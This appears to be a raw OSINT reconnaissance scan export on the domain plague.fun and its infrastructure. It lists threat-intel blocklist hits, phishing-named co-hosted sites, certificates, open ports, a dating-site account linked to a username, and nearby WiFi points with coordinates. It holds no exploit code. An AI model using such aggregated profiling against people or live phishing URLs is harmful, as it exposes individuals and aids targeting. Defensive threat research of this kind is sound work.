00:09:53 Malicious IP on Same Subnet Yes abuse.ch 0 0 3 0 None abuse.ch Feodo Tracker (IP) [90.116.0.0/16] https://feodotracker.abuse.ch/downloads/ipblocklist.txt 90.116.0.0/16 2022-12-18 00:39:26 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.6] https://www.virustotal.com/en/ip-address/188.114.96.6/information/ 188.114.96.0/24 2022-12-18 00:18:27 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.11:443 188.114.97.0/24 2022-12-18 00:25:10 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 81.88.58.201 81.88.58.196 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None FriendFinder-X (Category: dating) https://www.friendfinder-x.com/profile/rasputain rasputain 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None php-web-server-1.0635412.repl.co 34.149.204.188 2022-12-18 00:08:24 Netblock Membership No RIPE 0 0 2 0 None 188.114.97.0/24 188.114.97.1 2022-12-18 00:22:07 Open TCP Port No Censys 0 1 2 0 None 34.149.204.188:9000 34.149.204.188 2022-12-18 00:08:56 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.0:443 188.114.96.0 2022-12-18 00:03:02 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.100 90.116.166.104 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:02:2D:03:B5:60) 37.780462,-122.390564 2022-12-18 00:21:13 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b0412988a19b82-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.97.0 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None onlinepichinchabankingecuinfor--ecuador1.repl.co 34.149.204.188 2022-12-18 00:09:29 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.9:443 188.114.96.0/24 2022-12-18 00:03:26 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 192.204.149.34.bc.googleusercontent.com 34.149.204.192 2022-12-18 00:03:11 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:a4:99:c7:6c:cb:8c:60:87:12:4d:ac:6d:aa:bc:48:46:46 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Jul 4 17:47:44 2022 GMT Not After : Oct 2 17:47:43 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:ce:73:2c:c8:b3:db:26:51:e1:69:3c:75:92:d7: ab:cf:10:67:fe:05:65:9a:30:2d:7c:2d:4e:bf:1e: 15:12:c0:09:9c:ee:72:a7:89:e2:dd:d3:84:6a:4b: 52:9b:7c:3a:1c:0c:22:4c:2d:61:74:cf:f3:4e:65: 58:68:18:ae:42 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: EB:E4:FE:82:AF:4F:43:5A:7C:54:A8:CD:51:1C:E9:3D:A1:D3:59:44 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:65:02:30:69:96:28:2e:8d:11:23:d2:df:8d:af:0e:86:91: 07:54:3a:ad:81:0f:6e:0c:ed:ba:58:9b:a8:dd:0b:f6:9f:5b: b8:d1:0d:0f:20:8d:96:07:bf:17:bf:40:1d:05:de:64:02:31: 00:b6:70:a5:8a:80:f9:65:63:f5:4e:8a:9f:00:55:5b:1c:61: af:79:57:92:51:0e:76:a7:d1:43:e6:9b:64:5c:22:3d:99:f7: f9:9b:ac:52:3e:73:11:67:61:8b:92:50:c7 2022-12-18 00:09:40 Co-Hosted Site No HackerTarget 0 0 2 0 None a-prime-sp-health.fyi 172.67.147.230 2022-12-18 00:06:15 HTTP Status Code No Web Spider 0 0 1 0 None 200 misogyny.wtf 2022-12-18 00:03:04 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.108 90.116.166.104 2022-12-18 00:25:57 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.org plague.fun 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:02:2D:00:21:01) 37.7803446,-122.3906132 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None default (Net ID: 00:01:24:F2:E2:35) 37.7803446,-122.3906132 2022-12-18 00:03:11 Affiliate - Internet Name No DNS Resolver 1 0 2 0 None lhcp3232.webapps.net 81.88.52.232 2022-12-18 00:21:58 Netblock IPv6 Membership No Censys 0 0 2 0 None 2a06:98c1:3120::/48 2a06:98c1:3120::1 2022-12-18 00:13:34 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None noc@cloudflare.com {u'asn_registry': u'arin', u'country_code': u'US', u'classification': u'suspicious', u'asn_country_code': u'US', u'is_open_proxy': False, u'creation_time': u'2020-12-17 02:56:49', u'asn_date': u'2015-02-25 00:00:00', u'tag': [u'phishing'], u'postal_code': u'20500', u'is_mining_pool': False, u'ip_addr': u'172.67.147.230', u'number_of_offline_malicious_urls_allocated': 0, u'registrant_name': u'Cloudflare, Inc.', u'city': u'Washington', u'last_updated': u'2021-05-26 00:00:00', u'number_of_online_malicious_urls_allocated': 0, u'number_of_whitelisted_domains_resolving': 0, u'state': u'CA', u'is_known_scanner': False, u'location': {u'lat': 38.9071923, u'lon': -77.0368707}, u'type': u'ip', u'email': [u'abuse@cloudflare.com', u'noc@cloudflare.com', u'rir@cloudflare.com'], u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'source': u'Hybrid-Analysis', u'first_seen': u'2021-10-31 19:15:15', u'description': u'Malware', u'last_seen': u'2021-10-31 19:15:23'}, {u'count': 1, u'description': u'BBVA Bancomer phishing', u'source': u'Antiphishing.com.ar', u'first_seen': u'2020-12-17 02:56:49', u'ref': [279], u'last_seen': u'2020-12-17 02:56:49'}], u'modification_time': u'2021-10-31 19:15:23', u'asn_cidr': u'172.67.144.0/20', u'number_of_domains_resolving': 0, u'is_tor_node': False, u'address': u'101 Townsend Street', u'cidr': [u'172.64.0.0/13'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': False, u'as_name': u'AS13335 - Cloudflare, Inc.', u'is_vpn_node': False} 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ad04409be52d85-ORD Content-Encoding: gzip 188.114.97.1 2022-12-18 00:09:52 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.20:8443 188.114.96.0/24 2022-12-18 00:17:00 Web Content No Web Spider 1 0 4 0 None /*! * Bootstrap v3.4.1 (https://getbootstrap.com/) * Copyright 2011-2019 Twitter, Inc. * Licensed under the MIT license */ if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");!function(t){"use strict";var e=jQuery.fn.jquery.split(" ")[0].split(".");if(e[0]<2&&e[1]<9||1==e[0]&&9==e[1]&&e[2]<1||3this.$items.length-1||t<0))return this.sliding?this.$element.one("slid.bs.carousel",function(){e.to(t)}):i==t?this.pause().cycle():this.slide(i"]} 20.226.83.185 2022-12-18 00:16:53 Company Name No Company Name Extractor 0 0 3 0 None Cloudflare\, Inc. C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 2022-12-18 00:24:47 Physical Location No MetaDefender 0 0 1 0 None Campinas, Brazil 20.195.209.219 2022-12-18 00:20:49 Physical Location No Censys 1 0 1 0 None Zurich, Zurich, 8000, Switzerland, Europe 51.103.210.236 2022-12-18 00:02:56 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: e5:46:5a:b1:fb:47:13:cc:0e:4e:81:45:49:c8:68:c3 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 Validity Not Before: Sep 1 20:47:45 2022 GMT Not After : Nov 30 20:47:44 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:b8:a8:f1:ca:81:88:62:ce:b7:cb:e5:5f:70:5d: a9:d6:19:67:8b:9a:69:7c:3e:b0:1a:bf:ee:8e:41: 4b:60:c8:0e:71:b0:ee:9d:06:89:ea:42:9b:af:7c: 48:a8:dc:72:38:b2:40:b2:8b:0c:71:d6:cf:8c:4c: 53:f8:67:e4:7f:60:a0:99:71:a1:b8:43:c5:ac:14: 39:cc:43:b8:4b:37:35:d7:ce:16:69:79:a3:d5:53: e2:6e:2c:f7:a6:1f:8c:b4:ec:ce:6e:53:98:9b:ab: 62:08:cf:8d:70:8f:b2:0a:bd:98:3d:36:e1:f9:e1: bf:19:54:07:8d:e9:35:76:fe:c6:0f:41:8f:3b:e5: a6:09:2f:df:f1:e2:47:95:78:fa:a2:a2:32:98:b0: 41:0c:82:5d:b0:b9:fd:29:cd:b7:42:24:54:13:89: 34:19:e6:93:92:d4:e6:b9:ad:42:59:2a:d2:95:8b: c8:08:b5:b5:eb:f0:04:bf:bc:a5:6c:07:1a:d0:ac: 9c:9c:c8:69:a8:dd:20:73:eb:78:6f:cc:33:40:f2: ca:45:5b:11:72:b1:86:45:2f:03:d1:de:78:a2:24: 3c:ac:18:42:19:ac:73:ef:fd:c7:72:14:e3:2c:e5: 40:80:36:85:b0:76:ca:de:d3:9c:2a:c2:82:26:af: 6a:25 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 5B:64:C5:97:48:7A:C9:8D:92:D2:CA:90:DF:5B:FF:61:46:87:B1:6E X509v3 Authority Key Identifier: keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8 Authority Information Access: OCSP - URI:http://ocsp.pki.goog/s/gts1p5/V-CqIJuvA-8 CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.11129.2.5.3 X509v3 CRL Distribution Points: Full Name: URI:http://crls.pki.goog/gts1p5/EE-IMN5cLuw.crl CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 2d:4d:db:39:e5:eb:23:3e:18:2b:77:dd:21:24:63:de:69:88: 0f:9e:17:b2:35:af:6e:93:1a:96:fe:0c:a3:37:af:2e:d6:43: e8:24:ee:ae:4c:2a:e5:4b:57:72:90:16:3d:61:16:54:dd:c6: 9c:eb:22:67:30:01:07:2e:49:c0:01:b6:3c:14:29:95:a2:9a: a1:63:db:08:fd:03:00:f4:54:5c:d8:4a:fc:6f:5b:26:4d:7d: 6e:43:ae:76:9e:d3:e1:69:3d:94:79:64:6c:31:03:86:51:a5: c7:ce:d8:16:24:9c:a4:8a:b7:c9:ff:56:da:53:fb:84:4b:f0: d1:e0:4e:0a:3c:53:54:98:01:77:fa:79:d4:ce:5b:1d:b2:a6: 10:93:20:f8:1c:8a:2c:af:5f:43:c4:d8:0d:53:e8:bb:41:fb: d1:7b:18:4c:9f:51:81:8a:2f:c8:da:90:df:f4:e7:d4:28:0d: 5b:1d:b4:f6:e5:90:01:1a:30:ba:7d:6c:bf:48:e6:2b:64:ea: 3a:0d:16:71:ad:c2:81:17:88:59:f8:8c:af:16:6c:9d:56:99: 20:bf:39:ed:60:8b:d6:02:c0:16:b4:76:c6:80:59:91:f8:59: 46:79:a6:23:8f:c6:43:b4:16:64:4e:77:83:33:cb:a5:f2:01: 0c:3c:cd:87 plague.fun 2022-12-18 00:40:43 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: misogyny.ca Registry Domain ID: 95142585-CIRA Registrar WHOIS Server: whois.ca.fury.ca Registrar URL: http://www.namespro.ca Updated Date: 2021-12-26T12:40:21Z Creation Date: 2021-07-07T19:00:05Z Registry Expiry Date: 2023-07-07T19:00:05Z Registrar: Namespro Solutions Inc. Registrar IANA ID: not applicable Registrar Abuse Contact Email: abuse@namespro.ca Registrar Abuse Contact Phone: +1.6046818007 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: REDACTED FOR PRIVACY Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: REDACTED FOR PRIVACY Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Billing ID: REDACTED FOR PRIVACY Billing Name: REDACTED FOR PRIVACY Billing Organization: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing City: REDACTED FOR PRIVACY Billing State/Province: REDACTED FOR PRIVACY Billing Postal Code: REDACTED FOR PRIVACY Billing Country: REDACTED FOR PRIVACY Billing Phone: REDACTED FOR PRIVACY Billing Phone Ext: REDACTED FOR PRIVACY Billing Fax: REDACTED FOR PRIVACY Billing Fax Ext: REDACTED FOR PRIVACY Billing Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Name Server: slns1.namespro.ca Name Server: slns2.namespro.ca DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:40:43Z <<< For more information on Whois status codes, please visit https://icann.org/epp % % Use of CIRA's WHOIS service is governed by the Terms of Use in its Legal % Notice, available at http://www.cira.ca/legal-notice/?lang=en % % (c) 2022 Canadian Internet Registration Authority, (http://www.cira.ca/) Domain Name: misogyny.ca Registry Domain ID: 95142585-CIRA Registrar WHOIS Server: whois.ca.fury.ca Registrar URL: http://www.namespro.ca Updated Date: 2021-12-26T12:40:21Z Creation Date: 2021-07-07T19:00:05Z Registry Expiry Date: 2023-07-07T19:00:05Z Registrar: Namespro Solutions Inc. Registrar IANA ID: not applicable Registrar Abuse Contact Email: abuse@namespro.ca Registrar Abuse Contact Phone: +1.6046818007 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: REDACTED FOR PRIVACY Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: REDACTED FOR PRIVACY Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Billing ID: REDACTED FOR PRIVACY Billing Name: REDACTED FOR PRIVACY Billing Organization: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing City: REDACTED FOR PRIVACY Billing State/Province: REDACTED FOR PRIVACY Billing Postal Code: REDACTED FOR PRIVACY Billing Country: REDACTED FOR PRIVACY Billing Phone: REDACTED FOR PRIVACY Billing Phone Ext: REDACTED FOR PRIVACY Billing Fax: REDACTED FOR PRIVACY Billing Fax Ext: REDACTED FOR PRIVACY Billing Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Name Server: slns1.namespro.ca Name Server: slns2.namespro.ca DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:40:43Z <<< For more information on Whois status codes, please visit https://icann.org/epp % % Use of CIRA's WHOIS service is governed by the Terms of Use in its Legal % Notice, available at http://www.cira.ca/legal-notice/?lang=en % % (c) 2022 Canadian Internet Registration Authority, (http://www.cira.ca/) misogyny.ca 2022-12-18 00:13:56 HTTP Status Code No Web Spider 0 0 2 0 None None https://obf.plague.fun/obf/ 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:2086 188.114.97.1 2022-12-18 00:12:09 Physical Location No ipapi.co 0 0 2 0 None Amsterdam, North Holland, NH, Netherlands, NL 188.114.96.0 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 07:55:46 (Net ID: 00:02:2D:05:BB:87) 37.7803446,-122.3906132 2022-12-18 00:07:18 Web Content No Web Spider 0 0 3 0 None body { background-color: #3c4359; background: linear-gradient(140deg, #3c4359, #000); background-size: 400% 400%; -webkit-animation: background 18s ease infinite; -moz-animation: background 18s ease infinite; animation: background 18s ease infinite; } @-webkit-keyframes background { 0% { background-position: 5% 0% } 50% { background-position: 96% 10 0% } 100% { background-position: 5% 0% } } @-moz-keyframes background { 0% { background-position: 5% 0% } 50% { background-position: 96% 100% } 100% { background-position: 5% 0% } } @keyframes background { 0% { background-position: 5% 0% } 50% { background-position: 96% 100% } 100% { background-position: 5% 0% } } .content { position: absolute; top: 50%; left: 50%; margin-right: -50%; transform: translate(-50%, -50%); font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; font-weight: bold; font-size: 1.7rem; text-align: center; color: #fff; display: flex; flex-direction: column; } #text { padding: 0.8rem; border-radius: 15px; background-color: #3c4359; color: black; transition: transform .3s; } #text:hover { transform: scale(1.05); } #info { margin-top: 1rem; font-size: 1.2rem; } http://misogyny.wtf:2020/css/index.css 2022-12-18 00:08:30 IP Address No LeakIX 24 0 1 0 None 188.114.96.9 plague.fun 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 089070 (Net ID: 00:02:2D:08:90:70) 37.780462,-122.390564 2022-12-18 00:05:57 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None www.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:d8:e8:f9:6e:af:5c:60:20:62:8a:c9:01:2c:b1:dd:b1:ef Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 Validity Not Before: Aug 27 16:08:50 2020 GMT Not After : Nov 25 16:08:50 2020 GMT Subject: CN=www.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:a4:9b:a5:f9:88:bf:e3:84:c3:a7:20:d1:1a:68: 2a:3d:5d:5c:4b:72:46:33:3f:80:e8:7a:45:73:6a: cd:07:c0:56:2b:61:7f:4c:56:dd:e0:bd:ef:24:8e: 73:91:7b:f0:e5:0c:c8:6a:13:46:77:1a:e3:50:81: 51:d2:1d:d8:a1:35:fa:0b:fa:09:37:00:58:4e:31: 83:0e:f7:07:90:d0:0e:1e:4d:7e:52:e1:04:8b:4e: b1:28:95:49:9e:2d:53:a9:b6:0f:7d:c4:07:f0:5a: 9d:50:36:ef:b8:7b:f9:ad:59:38:88:93:89:af:c3: 25:b9:9a:a0:2e:13:8b:7e:ed:0b:3a:98:fc:89:52: 7d:f8:41:c4:2e:8d:b6:b3:09:f9:43:e5:70:bd:bd: 74:fa:e6:70:2e:e6:54:b0:82:97:a8:a9:e0:71:03: a4:73:0a:ae:0c:e7:ea:53:a5:24:3c:09:c1:da:78: ee:a9:b7:a3:8f:a6:db:2e:69:3a:ea:08:50:68:13: bd:77:60:e1:be:f1:69:20:d6:c3:b2:82:61:86:74: b7:1a:f9:fa:f1:1b:dd:5c:9c:a4:ac:c0:af:83:49: 29:00:9f:75:fc:61:8b:3c:71:21:e2:a1:7a:40:65: 1b:63:de:97:d8:3d:55:8f:6f:0b:4d:52:7c:3f:82: f7:c3 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: CF:A0:FE:3E:4E:5F:7F:0F:22:5E:1D:C3:E8:1E:94:AD:7F:15:41:85 X509v3 Authority Key Identifier: keyid:A8:4A:6A:63:04:7D:DD:BA:E6:D1:39:B7:A6:45:65:EF:F3:A8:EC:A1 Authority Information Access: OCSP - URI:http://ocsp.int-x3.letsencrypt.org CA Issuers - URI:http://cert.int-x3.letsencrypt.org/ X509v3 Subject Alternative Name: DNS:plague.fun, DNS:www.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 03:d1:30:3c:9c:0c:76:5e:5e:8a:70:97:ba:72:33:0f:1d:98: a3:91:84:ef:de:9c:97:00:45:7f:5b:7b:ec:f0:c2:dc:25:49: 63:fb:e8:f5:ba:ed:db:30:90:c0:e5:2d:9b:cc:86:e8:04:1e: 5c:b9:18:8f:12:ef:ab:61:7f:d1:29:58:a8:7a:42:68:ae:11: ff:0b:82:22:8a:be:79:b4:68:56:47:4f:28:79:ef:61:7f:51: df:55:84:a1:56:ff:5b:4f:47:04:ef:9b:03:a9:7b:a6:1d:8f: 7b:e4:81:2b:05:de:42:59:e5:c4:89:1d:6f:b2:c3:e9:92:07: 00:f6:fb:93:99:69:52:10:c8:89:65:8b:75:04:78:4e:b6:8b: a6:5d:c9:32:51:27:3a:25:5a:96:67:00:14:2a:9a:29:bc:8c: f1:1f:97:1d:3d:b0:0a:c1:cd:99:bc:42:1c:18:be:ac:4f:e6: 72:cd:5d:a8:99:3b:6f:9a:16:da:15:8e:ef:af:9d:0f:69:63: f5:00:5c:c4:65:5c:d1:65:60:d6:17:d4:8e:02:b4:0e:e3:e0: 96:8d:96:e0:84:08:33:ed:8b:a7:b7:4b:20:91:d3:85:7f:17: 9f:c3:33:cf:19:5f:be:1d:f0:0e:73:88:e8:a8:b5:24:50:84: c1:0d:fc:cf 2022-12-18 00:10:05 Linked URL - Internal No URLScan.io 1 0 1 0 None https://zerotwo-best-waifu.online/778112985743251/wap/enner/injector zerotwo-best-waifu.online 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SpeedStream (Net ID: 00:01:24:F0:82:16) 37.7803446,-122.3906132 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None onlinebankingpichinchaaccount--ecuador0.repl.co 34.149.204.188 2022-12-18 00:21:30 Open TCP Port No Censys 0 0 2 0 None 172.67.190.129:2052 172.67.190.129 2022-12-18 00:02:43 SSL Certificate - Raw Data No CertSpotter 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:f8:40:07:a9:2a:29:fa:95:e2:5f:ea:f2:e9:75:79:57:8e Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Nov 4 13:11:41 2022 GMT Not After : Feb 2 13:11:40 2023 GMT Subject: CN=atlas.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:e0:32:37:45:7d:4d:02:f9:aa:10:fa:d8:e8:0f: 29:c6:0a:f9:0e:81:76:85:f5:b9:b0:a4:36:23:07: 00:08:99:6b:a4:7e:21:94:8c:60:7b:0a:95:d3:8a: 8e:e0:f5:ce:17:6f:42:86:0a:0b:5a:a3:ea:41:92: 62:0f:36:29:62 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 50:DB:72:0E:7F:20:4D:E9:E5:87:34:C6:B6:D2:C8:CE:E1:5B:20:8F X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:atlas.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84: 16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52 Timestamp : Nov 4 14:11:41.192 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:61:29:22:AC:4F:7C:30:86:DB:CB:A5:62: 1A:74:E6:F0:17:04:90:2B:D9:04:A5:D2:DA:A2:8A:F3: A8:7C:6C:79:02:20:6F:4C:38:D1:94:98:CA:D0:D5:12: AA:B4:E4:1E:A2:B5:70:A7:A7:C4:FD:0A:52:BE:7D:9A: 05:67:81:D0:16:03 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 